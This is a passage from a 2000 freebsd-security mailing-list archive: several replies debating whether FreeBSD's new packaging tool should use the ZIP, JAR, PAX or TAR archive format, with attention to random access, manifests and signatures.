nate@yogotech.com) Received: from nomad.yogotech.com (nomad.yogotech.com [206.127.123.131]) by ns.yogotech.com (8.9.3/8.9.3) with ESMTP id JAA26430; Sat, 13 May 2000 09:02:41 -0600 (MDT) (envelope-from nate@nomad.yogotech.com) Received: (from nate@localhost) by nomad.yogotech.com (8.8.8/8.8.8) id JAA04832; Sat, 13 May 2000 09:02:40 -0600 (MDT) (envelope-from nate) Date: Sat, 13 May 2000 09:02:40 -0600 (MDT) Message-Id: <200005131502.JAA04832@nomad.yogotech.com> From: Nate Williams MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit To: Michael Robinson Cc: nate@yogotech.com, freebsd-security@FreeBSD.ORG Subject: Re: New packaging tool (was Re: Applying patches with out a compiler) In-Reply-To: <200005131111.TAA13455@netrinsics.com> References: <200005130137.TAA09188@nomad.yogotech.com> <200005131111.TAA13455@netrinsics.com> X-Mailer: VM 6.34 under 19.16 "Lille" XEmacs Lucid Reply-To: nate@yogotech.com (Nate Williams) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > >There are numerous advantages to using something like ZIP, including > >removing the requirement to 'unpack' the archive in a staging area, > >since we could now unpack it directly in it's installation location. > > > >ZIP also allows signatures, and we have lots of free software that we > >can leverage to implement the tools with it. > > Or, heck, why not JAR format, seeing as it's a well-defined standard, does > everything necessary, and has multiple interoperable implementations. FWIW, it's the same format. :) :) Nate To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat May 13 8:41:43 2000 Delivered-To: freebsd-security@freebsd.org Received: from public.bta.net.cn (public.bta.net.cn [202.96.0.97]) by hub.freebsd.org (Postfix) with ESMTP id 1B16637B9CD for ; Sat, 13 May 2000 08:41:39 -0700 (PDT) (envelope-from robinson@netrinsics.com) Received: from netrinsics.com ([202.108.133.96]) by public.bta.net.cn (8.9.3/8.9.3) with ESMTP id XAA18637 for ; Sat, 13 May 2000 23:38:22 +0800 (GMT) Received: (from robinson@localhost) by netrinsics.com (8.9.3/8.9.3) id XAA13898; Sat, 13 May 2000 23:42:38 +0800 (+0800) (envelope-from robinson) Date: Sat, 13 May 2000 23:42:38 +0800 (+0800) From: Michael Robinson Message-Id: <200005131542.XAA13898@netrinsics.com> To: nate@yogotech.com Subject: Re: New packaging tool (was Re: Applying patches with out a compiler) Cc: freebsd-security@freebsd.org In-Reply-To: <200005131502.JAA04832@nomad.yogotech.com> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Nate Williams writes: >> Or, heck, why not JAR format, seeing as it's a well-defined standard, does >> everything necessary, and has multiple interoperable implementations. > >FWIW, it's the same format. :) :) Not strictly true. All JAR files are ZIP files, but not all ZIP files are JAR files. From your paen to the benefits of ZIP files, it sounded like you might go off and reinvent manifests, signature meta-data, and all the other stuff that's in the JAR spec, but in an incompatible, FreeBSD-specific way. -Michael Robinson To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat May 13 9:44:36 2000 Delivered-To: freebsd-security@freebsd.org Received: from ns.yogotech.com (ns.yogotech.com [206.127.123.66]) by hub.freebsd.org (Postfix) with ESMTP id 93BF937B50F for ; Sat, 13 May 2000 09:44:30 -0700 (PDT) (envelope-from nate@yogotech.com) Received: from nomad.yogotech.com (nomad.yogotech.com [206.127.123.131]) by ns.yogotech.com (8.9.3/8.9.3) with ESMTP id KAA27135; Sat, 13 May 2000 10:44:28 -0600 (MDT) (envelope-from nate@nomad.yogotech.com) Received: (from nate@localhost) by nomad.yogotech.com (8.8.8/8.8.8) id KAA05089; Sat, 13 May 2000 10:44:27 -0600 (MDT) (envelope-from nate) Date: Sat, 13 May 2000 10:44:27 -0600 (MDT) Message-Id: <200005131644.KAA05089@nomad.yogotech.com> From: Nate Williams MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit To: Michael Robinson Cc: nate@yogotech.com, freebsd-security@FreeBSD.ORG Subject: Re: New packaging tool (was Re: Applying patches with out a compiler) In-Reply-To: <200005131542.XAA13898@netrinsics.com> References: <200005131502.JAA04832@nomad.yogotech.com> <200005131542.XAA13898@netrinsics.com> X-Mailer: VM 6.34 under 19.16 "Lille" XEmacs Lucid Reply-To: nate@yogotech.com (Nate Williams) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > >> Or, heck, why not JAR format, seeing as it's a well-defined standard, does > >> everything necessary, and has multiple interoperable implementations. > > > >FWIW, it's the same format. :) :) > > Not strictly true. All JAR files are ZIP files, but not all ZIP files are > JAR files. True. When I talk about ZIP, I meant to contrast it with PAX and TAR, not talk about details such as manifests, signatures (which are part of ZIP BTW..), and such. Nate To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat May 13 23:46:54 2000 Delivered-To: freebsd-security@freebsd.org Received: from dt051n0b.san.rr.com (dt051n0b.san.rr.com [204.210.32.11]) by hub.freebsd.org (Postfix) with ESMTP id B320A37BD40 for ; Sat, 13 May 2000 23:46:51 -0700 (PDT) (envelope-from DougB@gorean.org) Received: from gorean.org (doug@master [10.0.0.2]) by dt051n0b.san.rr.com (8.9.3/8.9.3) with ESMTP id XAA29405; Sat, 13 May 2000 23:46:36 -0700 (PDT) (envelope-from DougB@gorean.org) Message-ID: <391E4BCC.6EA3DB59@gorean.org> Date: Sat, 13 May 2000 23:46:36 -0700 From: Doug Barton Organization: Triborough Bridge & Tunnel Authority X-Mailer: Mozilla 4.72 [en] (X11; U; FreeBSD 5.0-CURRENT-0508 i386) X-Accept-Language: en MIME-Version: 1.0 To: Nate Williams Cc: Wes Peters , freebsd-security@FreeBSD.ORG Subject: Re: New packaging tool (was Re: Applying patches with out a compiler) References: <107101bfbc60$aabeb350$040aa8c0@local.mindstep.com> <391C9CBC.4E0ED8E5@softweyr.com> <200005130137.TAA09188@nomad.yogotech.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Nate Williams wrote: > Not PAX. ZIP, since PAX and tar both require you to read to the end of > the file to determine the contents of the file, and don't allow you to > do random access I/O and pull out individual files. > > There are numerous advantages to using something like ZIP, including > removing the requirement to 'unpack' the archive in a staging area, > since we could now unpack it directly in it's installation location. > > ZIP also allows signatures, and we have lots of free software that we > can leverage to implement the tools with it. I concur. I've always wondered why (info-)zip hasn't enjoyed more popularity in the unix world. I used it extensively back when I ran OS/2, and it has a lot of nice features. Doug -- "Live free or die" - State motto of my ancestral homeland, New Hampshire Do YOU Yahoo!? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message